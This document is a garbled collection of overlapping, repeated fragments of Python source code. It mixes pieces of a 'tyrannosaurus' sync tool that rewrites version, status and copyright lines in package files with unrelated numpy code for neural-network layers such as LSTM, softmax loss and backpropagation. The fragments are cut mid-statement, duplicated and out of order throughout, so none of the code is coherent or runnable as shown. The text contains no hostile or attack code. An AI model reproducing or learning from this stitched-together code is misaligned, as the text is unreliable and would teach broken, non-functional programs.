self.context.project / \"__init__.py\", { \"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__", "= \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ),", "_Context logger = logging.getLogger(__package__) class Sync: def __init__(self, context: _Context, dry_run: bool): self.context", "new_lines = [] for line in path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items(): if", "in replace.items(): if line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not", "else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path))", "if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) -> None: if", "{\"{% set version = \": '{% set version = \"' + str(self.context.version) +", "from typing import Sequence, Mapping from tyrannosaurus.context import _Context logger = logging.getLogger(__package__) class", "<filename>tyrannosaurus/sync.py \"\"\" Sync tool. \"\"\" from __future__ import annotations import logging from pathlib", "if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project / \"__init__.py\", { \"__status__ = \": '__status__", "= \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) ->", "pathlib import Path from typing import Sequence, Mapping from tyrannosaurus.context import _Context logger", "= [] for line in path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items(): if line.startswith(k):", "\"\"\" Sync tool. 
\"\"\" from __future__ import annotations import logging from pathlib import", "logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project", "self.dry_run = dry_run def sync(self, path: Path) -> Sequence[str]: context = _Context(path, dry_run=self.dry_run)", "to {}\".format(path)) def fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project /", "-> Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for s in", "self.replace_substrs( self.context.path / self.context.project / \"__init__.py\", { \"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")),", "import Sequence, Mapping from tyrannosaurus.context import _Context logger = logging.getLogger(__package__) class Sync: def", "for k, v in replace.items(): if line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines =", "new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def", "path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs( self.context.path", "{}\".format(path)) def fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project / \"__init__.py\",", "'__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, )", "sync(self, path: Path) -> Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s)", "in context.targets] def has(self, key: str): return self.context.has_target(key) def replace_substrs(self, path: Path, replace:", "= 
\"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def", "context self.dry_run = dry_run def sync(self, path: Path) -> Sequence[str]: context = _Context(path,", "Sync tool. \"\"\" from __future__ import annotations import logging from pathlib import Path", "encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs( self.context.path /", "str]) -> None: self.context.back_up(path) new_lines = [] for line in path.read_text(encoding=\"utf8\").splitlines(): for k,", "= _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for s in context.targets] def has(self,", "new_lines.append(v) break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote", "\"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set", "/ \"__init__.py\", { \"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__", "has(self, key: str): return self.context.has_target(key) def replace_substrs(self, path: Path, replace: Mapping[str, str]) ->", "Mapping[str, str]) -> None: self.context.back_up(path) new_lines = [] for line in path.read_text(encoding=\"utf8\").splitlines(): for", "None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version = \": '{% set version", "logging.getLogger(__package__) class Sync: def __init__(self, context: _Context, dry_run: bool): self.context = context self.dry_run", "= logging.getLogger(__package__) class Sync: def __init__(self, context: _Context, dry_run: bool): self.context = context", "logging from pathlib import Path from typing import Sequence, Mapping from 
tyrannosaurus.context import", "from tyrannosaurus.context import _Context logger = logging.getLogger(__package__) class Sync: def __init__(self, context: _Context,", "context: _Context, dry_run: bool): self.context = context self.dry_run = dry_run def sync(self, path:", "self.context.project / \"__init__.py\", { \"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \":", "set version = \": '{% set version = \"' + str(self.context.version) + '\"", "[str(s) for s in context.targets] def has(self, key: str): return self.context.has_target(key) def replace_substrs(self,", "break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to", "replace: Mapping[str, str]) -> None: self.context.back_up(path) new_lines = [] for line in path.read_text(encoding=\"utf8\").splitlines():", "self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version = \": '{% set version = \"' +", "Path, replace: Mapping[str, str]) -> None: self.context.back_up(path) new_lines = [] for line in", "if line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines,", "typing import Sequence, Mapping from tyrannosaurus.context import _Context logger = logging.getLogger(__package__) class Sync:", "path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items(): if line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines", "= \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")),", "self.context.has_target(key) def replace_substrs(self, path: Path, replace: Mapping[str, str]) -> None: self.context.back_up(path) new_lines =", "self.fix_init() self.fix_recipe() return [str(s) for s in context.targets] def has(self, key: 
str): return", "context.targets] def has(self, key: str): return self.context.has_target(key) def replace_substrs(self, path: Path, replace: Mapping[str,", "self.context = context self.dry_run = dry_run def sync(self, path: Path) -> Sequence[str]: context", "\": '{% set version = \"' + str(self.context.version) + '\" %}'}, ) __all__", "\"\"\" from __future__ import annotations import logging from pathlib import Path from typing", "path: Path) -> Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for", "self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project / \"__init__.py\", { \"__status__ = \": '__status__ =", "self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version = \": '{% set version = \"'", "fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version = \": '{%", "logger = logging.getLogger(__package__) class Sync: def __init__(self, context: _Context, dry_run: bool): self.context =", "self.context.source(\"copyright\") ), \"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) ->", "Path) -> Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for s", "return self.context.has_target(key) def replace_substrs(self, path: Path, replace: Mapping[str, str]) -> None: self.context.back_up(path) new_lines", "new_lines = \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self)", "def replace_substrs(self, path: Path, replace: Mapping[str, str]) -> None: self.context.back_up(path) new_lines = []", "class Sync: def __init__(self, context: _Context, dry_run: bool): self.context = context self.dry_run =", "def __init__(self, context: _Context, dry_run: bool): self.context = 
context self.dry_run = dry_run def", "= \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) -> None: if self.has(\"recipe\"):", "-> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version = \": '{% set", "import annotations import logging from pathlib import Path from typing import Sequence, Mapping", "self.fix_recipe() return [str(s) for s in context.targets] def has(self, key: str): return self.context.has_target(key)", "bool): self.context = context self.dry_run = dry_run def sync(self, path: Path) -> Sequence[str]:", "annotations import logging from pathlib import Path from typing import Sequence, Mapping from", "\"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \": '__date__", "replace.items(): if line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not self.dry_run:", "_Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for s in context.targets] def has(self, key:", "Mapping from tyrannosaurus.context import _Context logger = logging.getLogger(__package__) class Sync: def __init__(self, context:", "fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project / \"__init__.py\", { \"__status__", "}, ) def fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version", "Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for s in context.targets]", "for line in path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items(): if line.startswith(k): new_lines.append(v) break", "tool. 
\"\"\" from __future__ import annotations import logging from pathlib import Path from", "self.context.path_source(\"recipe\"), {\"{% set version = \": '{% set version = \"' + str(self.context.version)", "import logging from pathlib import Path from typing import Sequence, Mapping from tyrannosaurus.context", "'__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ =", "= context self.dry_run = dry_run def sync(self, path: Path) -> Sequence[str]: context =", "s in context.targets] def has(self, key: str): return self.context.has_target(key) def replace_substrs(self, path: Path,", "= \": '{% set version = \"' + str(self.context.version) + '\" %}'}, )", "dry_run: bool): self.context = context self.dry_run = dry_run def sync(self, path: Path) ->", "), \"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) -> None:", "if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version = \": '{% set version =", "line in path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items(): if line.startswith(k): new_lines.append(v) break else:", "not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) -> None: if self.has(\"init\"):", "str): return self.context.has_target(key) def replace_substrs(self, path: Path, replace: Mapping[str, str]) -> None: self.context.back_up(path)", "\"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\")", ") def fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version =", "tyrannosaurus.context import _Context logger = logging.getLogger(__package__) class Sync: def __init__(self, context: 
_Context, dry_run:", "[] for line in path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items(): if line.startswith(k): new_lines.append(v)", "def fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version = \":", "from pathlib import Path from typing import Sequence, Mapping from tyrannosaurus.context import _Context", "\"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) -> None: if", "-> None: self.context.back_up(path) new_lines = [] for line in path.read_text(encoding=\"utf8\").splitlines(): for k, v" ]
[ "data. asol : string Name of the variable on the grid. \"\"\" X,", "else: values = (-8 * numpy.pi**2 * numpy.cos(2 * numpy.pi * X) *", "* numpy.pi * Y)) else: values = (-8 * numpy.pi**2 * numpy.cos(2 *", "the right-hand side of the Poisson system. Arguments --------- grid : flowx.Grid object", "grid.y) if(user_bc == 'dirichlet'): values = numpy.sin(2 * numpy.pi * X) * numpy.sin(2", "values = (-8 * numpy.pi**2 * numpy.sin(2 * numpy.pi * X) * numpy.sin(2", "the grid. \"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values =", "grid.y) if(user_bc == 'dirichlet'): values = (-8 * numpy.pi**2 * numpy.sin(2 * numpy.pi", "= numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = numpy.sin(2 * numpy.pi * X)", "numpy.pi * X) * numpy.cos(2 * numpy.pi * Y) grid.set_values(asol, values.transpose()) def get_rhs(grid,", "* numpy.pi**2 * numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi *", "Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute and set the right-hand side", "--------- grid : flowx.Grid object Grid containing data. rvar : string Name of", "system. Arguments --------- grid : flowx.Grid object Grid containing data. rvar : string", "import numpy def get_analytical(grid, asol, user_bc): \"\"\"Compute and set the analytical solution. Arguments", "flowx.Grid object Grid containing data. rvar : string Name of the variable on", "Grid containing data. asol : string Name of the variable on the grid.", "= numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y) else:", "* numpy.pi * X) * numpy.sin(2 * numpy.pi * Y) else: values =", "numpy.pi * Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute and set the", "* numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y)) grid.set_values(rvar,", "and set the analytical solution. Arguments --------- grid : flowx.Grid object Grid containing", "variable on the grid. 
\"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'):", "if(user_bc == 'dirichlet'): values = numpy.sin(2 * numpy.pi * X) * numpy.sin(2 *", "Grid containing data. rvar : string Name of the variable on the grid.", "(-8 * numpy.pi**2 * numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi", "X) * numpy.sin(2 * numpy.pi * Y)) else: values = (-8 * numpy.pi**2", ": flowx.Grid object Grid containing data. rvar : string Name of the variable", "grid : flowx.Grid object Grid containing data. asol : string Name of the", "simulation.\"\"\" import numpy def get_analytical(grid, asol, user_bc): \"\"\"Compute and set the analytical solution.", "* numpy.pi * X) * numpy.cos(2 * numpy.pi * Y) grid.set_values(asol, values.transpose()) def", "grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute and set the right-hand side of", "\"\"\"Compute and set the analytical solution. Arguments --------- grid : flowx.Grid object Grid", "numpy.pi * Y)) else: values = (-8 * numpy.pi**2 * numpy.cos(2 * numpy.pi", "* numpy.pi * X) * numpy.sin(2 * numpy.pi * Y)) else: values =", "if(user_bc == 'dirichlet'): values = (-8 * numpy.pi**2 * numpy.sin(2 * numpy.pi *", "numpy.sin(2 * numpy.pi * Y) else: values = numpy.cos(2 * numpy.pi * X)", "\"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = (-8 *", "* numpy.pi * Y) else: values = numpy.cos(2 * numpy.pi * X) *", "the Poisson system. Arguments --------- grid : flowx.Grid object Grid containing data. rvar", "defined module for simulation.\"\"\" import numpy def get_analytical(grid, asol, user_bc): \"\"\"Compute and set", ": flowx.Grid object Grid containing data. asol : string Name of the variable", "* numpy.pi**2 * numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi *", "--------- grid : flowx.Grid object Grid containing data. 
asol : string Name of", "* X) * numpy.sin(2 * numpy.pi * Y) else: values = numpy.cos(2 *", "asol, user_bc): \"\"\"Compute and set the analytical solution. Arguments --------- grid : flowx.Grid", "else: values = numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi *", "values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute and set the right-hand side of the", "solution. Arguments --------- grid : flowx.Grid object Grid containing data. asol : string", "'dirichlet'): values = (-8 * numpy.pi**2 * numpy.sin(2 * numpy.pi * X) *", "Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = (-8 * numpy.pi**2 *", "def get_rhs(grid, rvar, user_bc): \"\"\"Compute and set the right-hand side of the Poisson", "* X) * numpy.sin(2 * numpy.pi * Y)) else: values = (-8 *", "\"\"\"User defined module for simulation.\"\"\" import numpy def get_analytical(grid, asol, user_bc): \"\"\"Compute and", "values = numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y)", "values = (-8 * numpy.pi**2 * numpy.cos(2 * numpy.pi * X) * numpy.cos(2", "object Grid containing data. rvar : string Name of the variable on the", "grid. \"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = (-8", "* numpy.pi * Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute and set", "string Name of the variable on the grid. \"\"\" X, Y = numpy.meshgrid(grid.x,", "rvar, user_bc): \"\"\"Compute and set the right-hand side of the Poisson system. Arguments", "numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y)) else: values", "module for simulation.\"\"\" import numpy def get_analytical(grid, asol, user_bc): \"\"\"Compute and set the", "grid : flowx.Grid object Grid containing data. 
rvar : string Name of the", "Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = numpy.sin(2 * numpy.pi *", "numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = (-8 * numpy.pi**2 * numpy.sin(2 *", "* numpy.sin(2 * numpy.pi * Y)) else: values = (-8 * numpy.pi**2 *", "'dirichlet'): values = numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi *", "* numpy.sin(2 * numpy.pi * Y) else: values = numpy.cos(2 * numpy.pi *", "rvar : string Name of the variable on the grid. \"\"\" X, Y", "X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = (-8 * numpy.pi**2", "object Grid containing data. asol : string Name of the variable on the", "numpy.pi * X) * numpy.sin(2 * numpy.pi * Y)) else: values = (-8", "numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y) grid.set_values(asol, values.transpose())", "get_rhs(grid, rvar, user_bc): \"\"\"Compute and set the right-hand side of the Poisson system.", "def get_analytical(grid, asol, user_bc): \"\"\"Compute and set the analytical solution. Arguments --------- grid", "Y)) else: values = (-8 * numpy.pi**2 * numpy.cos(2 * numpy.pi * X)", "Name of the variable on the grid. \"\"\" X, Y = numpy.meshgrid(grid.x, grid.y)", ": string Name of the variable on the grid. \"\"\" X, Y =", "numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y) else: values", "== 'dirichlet'): values = (-8 * numpy.pi**2 * numpy.sin(2 * numpy.pi * X)", "numpy.pi**2 * numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y))", "containing data. asol : string Name of the variable on the grid. \"\"\"", "Y) else: values = numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi", "the variable on the grid. \"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc ==", "\"\"\"Compute and set the right-hand side of the Poisson system. Arguments --------- grid", "grid. 
\"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = numpy.sin(2", "numpy.pi * X) * numpy.sin(2 * numpy.pi * Y) else: values = numpy.cos(2", "* Y)) else: values = (-8 * numpy.pi**2 * numpy.cos(2 * numpy.pi *", "X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = numpy.sin(2 * numpy.pi", "the analytical solution. Arguments --------- grid : flowx.Grid object Grid containing data. asol", "X) * numpy.cos(2 * numpy.pi * Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc):", "* numpy.cos(2 * numpy.pi * Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute", "set the analytical solution. Arguments --------- grid : flowx.Grid object Grid containing data.", "\"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = numpy.sin(2 *", "set the right-hand side of the Poisson system. Arguments --------- grid : flowx.Grid", "= numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = (-8 * numpy.pi**2 * numpy.sin(2", "* Y) else: values = numpy.cos(2 * numpy.pi * X) * numpy.cos(2 *", "flowx.Grid object Grid containing data. asol : string Name of the variable on", "user_bc): \"\"\"Compute and set the right-hand side of the Poisson system. Arguments ---------", "= (-8 * numpy.pi**2 * numpy.sin(2 * numpy.pi * X) * numpy.sin(2 *", "numpy.pi**2 * numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y))", "Poisson system. Arguments --------- grid : flowx.Grid object Grid containing data. rvar :", "numpy.pi * Y) else: values = numpy.cos(2 * numpy.pi * X) * numpy.cos(2", "* numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y)) else:", "user_bc): \"\"\"Compute and set the analytical solution. 
Arguments --------- grid : flowx.Grid object", "numpy.sin(2 * numpy.pi * Y)) else: values = (-8 * numpy.pi**2 * numpy.cos(2", "* Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute and set the right-hand", "values = numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y)", "* X) * numpy.cos(2 * numpy.pi * Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar,", "right-hand side of the Poisson system. Arguments --------- grid : flowx.Grid object Grid", "data. rvar : string Name of the variable on the grid. \"\"\" X,", "X) * numpy.sin(2 * numpy.pi * Y) else: values = numpy.cos(2 * numpy.pi", "on the grid. \"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values", "of the variable on the grid. \"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc", "Arguments --------- grid : flowx.Grid object Grid containing data. rvar : string Name", "= numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y) grid.set_values(asol,", "Arguments --------- grid : flowx.Grid object Grid containing data. asol : string Name", "asol : string Name of the variable on the grid. \"\"\" X, Y", "= (-8 * numpy.pi**2 * numpy.cos(2 * numpy.pi * X) * numpy.cos(2 *", "get_analytical(grid, asol, user_bc): \"\"\"Compute and set the analytical solution. Arguments --------- grid :", "numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = numpy.sin(2 * numpy.pi * X) *", "for simulation.\"\"\" import numpy def get_analytical(grid, asol, user_bc): \"\"\"Compute and set the analytical", "containing data. rvar : string Name of the variable on the grid. \"\"\"", "and set the right-hand side of the Poisson system. Arguments --------- grid :", "numpy def get_analytical(grid, asol, user_bc): \"\"\"Compute and set the analytical solution. 
Arguments ---------", "== 'dirichlet'): values = numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi", "numpy.cos(2 * numpy.pi * Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute and", "numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y)) grid.set_values(rvar, values.transpose())", "(-8 * numpy.pi**2 * numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi", "side of the Poisson system. Arguments --------- grid : flowx.Grid object Grid containing", "analytical solution. Arguments --------- grid : flowx.Grid object Grid containing data. asol :", "of the Poisson system. Arguments --------- grid : flowx.Grid object Grid containing data." ]
[]
[ "for t in reversed(range(0, len(dOut))): dAct = dH[t] * self.activation.d(outputs[t]) ''' the following", "dCache is not None: dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden'] for t in", "cache[l]['cn'] if 'cn' in cache[l] else None, 'h0': cache[l]['hn'] if 'hn' in cache[l]", "optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return tmp_ class rNet:", "l in self.layers: l.init() def reset(self): for l in self.layers: l.reset() def add(self,", "= (cell[t - 1], dCell[t - 1]) if t > 0 else (c0,", "# dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:] * dCell[t]", "** 2) ''' the following line sums the gradients over the entire batch", "layer ''' shape = None weights = None activation = None def reset(self):", ":, 0:-1] = input_tensor[t, :, :] inputs[t, :, -1] = 1 raws[t] =", "h0=None): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1]", "batch, 4 * self.shape[1]]) if c0 is None: c0 = np.zeros([batch, self.shape[1]]) if", "self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW, cache_out def save(self, path): for i,l in", "self.shape[1]]) activations = np.zeros([time_steps, batch, 4 * self.shape[1]]) if c0 is None: c0", "rows and dY holds dY_i as its rows In other words, a product", "a previous call to softmax_loss function ''' return 1 class softmax_loss: ''' To", ":, self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs':", "+ np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:, 3", "dIn = np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights) for t in reversed(range(0, time_steps)):", "if c0 is None: c0 = np.zeros([batch, self.shape[1]]) if h0 is None: h0", "__call__(self, input): return 1 / (1 + np.exp(-input)) def d(self, input): return input", "as its rows In other words, a 
product of two matrices is a", "loss, dW, cache_out def save(self, path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self,", "if 'hn' in cache[l] else None} time_steps, batch, out_ = out.shape dIn =", "= dH[t - 1] if t > 0 else dh0 dh += dInput[t,", "= previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 * self.shape[1]] = 1.", "is not None: if cache0[l]['c0'] is not None and cache0[l]['h0'] is not None:", "= cache['inputs'] outputs = cache['outputs'] activations = cache['activations'] cell_act = cache['cells_act'] cell =", "dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, in_ =", "+= np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh =", "self.shape = shape def init(self, forget_bias_init=3): ''' forget bias initialization as seen in", "Connected layer ''' shape = None weights = None activation = None def", "- input * input class sigmoid: def __call__(self, input): return 1 / (1", "dc0 = np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if dCache is not None: dCell[-1]", "__init__(self, shape): self.shape = shape def init(self, forget_bias_init=3): ''' forget bias initialization as", "= [None] * self.num_of_layers() out = inputs for l in range(0, self.num_of_layers()): if", "time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, in_", "l(out) return out def init(self): for l in self.layers: l.init() def reset(self): for", "self.cell = None def reset(self): self.previous = None self.cell = None def __call__(self,", "batch, out_ = outputs.shape dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape)", "next_grad, cache, dCache=None, mask_start=0): inputs = cache['inputs'] outputs = cache['outputs'] activations = cache['activations']", "FCr: ''' Fully Connected recursive layer ''' shape = 
None weights = None", "1 raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws,", "single input and dY a single gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands for", "np.zeros_like(self.weights) for t in reversed(range(0, time_steps)): dAct = dOut[t] * self.activation.d(outputs[t]) ''' the", "derivative is covered by a previous call to softmax_loss function ''' return 1", "= np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if dCache is not None: dCell[-1] +=", "cache[l]['hn'] if 'hn' in cache[l] else None} time_steps, batch, out_ = out.shape dIn", "the last non-recursive layer ''' def __call__(self, input): shifted_ = input - np.max(input)", "self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1, :] = 0 def", "layer Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights =", "if dCache is not None: dH[-1] += np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))):", "= np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0 =", "used as the last non-recursive layer ''' def __call__(self, input): shifted_ = input", "None def __init__(self): self.num_of_layers = lambda: len(self.layers) def __call__(self, input): ''' input is", "self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs} def time_grad(self, dOut, cache,", "= activations[t, :, 0:self.shape[1]] * dCell[t] # activations dAct[t, :, 0:3 * self.shape[1]]", "shape self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + 1, self.shape[1])", "= self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor, h0=None): time_steps,", "np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None 
